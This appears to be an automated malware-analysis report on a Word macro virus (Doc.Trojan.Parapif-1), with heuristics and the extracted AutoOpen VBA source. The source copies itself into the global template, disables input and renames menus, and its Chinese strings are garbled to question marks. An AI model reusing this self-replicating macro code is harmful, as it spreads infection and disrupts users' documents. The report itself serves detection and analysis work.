MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro detected by ClamAV as 'Doc.Trojan.Parapif-1'. The macro is named 'AutoOpen' and attempts to copy itself, potentially to achieve persistence or spread. The document body text is in Chinese and attempts to disguise the malicious nature by claiming to be a harmless virus, which is a common social engineering tactic.
Heuristics (4)
- ClamAV: Doc.Trojan.Parapif-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Parapif-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11765 bytes |

SHA-256: a04bdf5195f35ce792db2cedfb3169454fcdc4026f476e610abb0927dc40edfb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim A
Dim B
Dim IQ
Dim aa
Dim s
Dim a_$
Dim am$
Dim IQ1
Dim aaa
Dim ss
Dim d
On Error Resume Next
WordBasic.DisableInput 1
A = 4
B = 2
IQ = WordBasic.CountMacros(0)
If IQ > 0 Then
For aa = 1 To IQ
If WordBasic.[MacroName$](aa, 0) = "AutoOpen" Then
s = 1
End If
Next aa
End If
a_$ = WordBasic.[FileName$]()
am$ = a_$ + ":AutoOpen"
If s <> 1 Then
WordBasic.MacroCopy am$, "AutoOpen", -1
End If
IQ1 = WordBasic.CountMacros(1)
If IQ1 > 0 Then
For aaa = 1 To IQ1
If WordBasic.[MacroName$](aaa, 1) = "AutoOpen" Then
ss = 1
End If
Next aaa
End If
If ss <> 1 Then
WordBasic.FileSaveAs Format:=A * 1 / B / B
WordBasic.MacroCopy "AutoOpen", am$, -1
End If
If WordBasic.Day(WordBasic.Now()) <= WordBasic.Int(Rnd() * 30) + 1 Then GoTo bye
WordBasic.FileNew
WordBasic.FormatFont Points:=30, Color:=1, Bold:=1
WordBasic.CenterPara
WordBasic.Insert "??!!??!!?????????????,"
WordBasic.InsertPara
WordBasic.Insert "??[?????--PART--5]!!"
For d = 1 To 10000
Next d
menu
exit_:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=30, Underline:=1, Color:=2, Bold:=1
WordBasic.Insert "????????, ???????, ????????, sorry !! ???shift? , ??? ?? / ???? ??!!"
bye:
End Sub
Private Sub menu()
On Error Resume Next
WordBasic.RenameMenu "??", "????(F)", 0
WordBasic.RenameMenu "??", "????(E)", 0
WordBasic.RenameMenu "??", "????(V)", 0
WordBasic.RenameMenu "??", "????(I)", 0
WordBasic.RenameMenu "??", "(O)???", 0
WordBasic.RenameMenu "??", "?????(T)", 0
WordBasic.RenameMenu "??", "(A)???", 0
WordBasic.RenameMenu "??", "?????(W)", 0
WordBasic.RenameMenu "??", "????(H)", 0
bye:
qu
End Sub
Private Sub qu()
Dim c
Dim x
Dim timer_
Dim d
Dim y
WordBasic.DisableInput 1
On Error Resume Next
WordBasic.Beep
WordBasic.MsgBox "? ? ? [ ? ? ? ? ? , ? ? ? ? ] !! ? ? ? ? ? ? ? ? ? , ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ", " ? ? ? ? ? ? ? ?------PART 5------ ", 32
WordBasic.Beep
WordBasic.MsgBox "? ? ? ? ? , ? ? ? ? ? !! ? ? ? ? ? , ? ? ? ? ? !! ? ? ? ? ? ? , ? ? ? ? ? , ? ? ? ? ? ? !! ? ? ? ? ? ? ?!! ", " ? ? ? ? ? ? ? ?------PART 5------ ", 32
GoTo FF
FF:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=48, Color:=2, Bold:=1
WordBasic.CenterPara
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FormatFont Points:=48, Color:=6, Bold:=1
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.FormatFont Points:=48, Underline:=1, Color:=1, Bold:=1
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.Insert "?"
For x = 1 To 20
WordBasic.Beep
For timer_ = 1 To 1000
Next timer_
Next x
GoTo FFF
FFF:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=30, Color:=6, Bold:=1
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.FormatFont Points:=30, Color:=1, Bold:=1
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
... (truncated)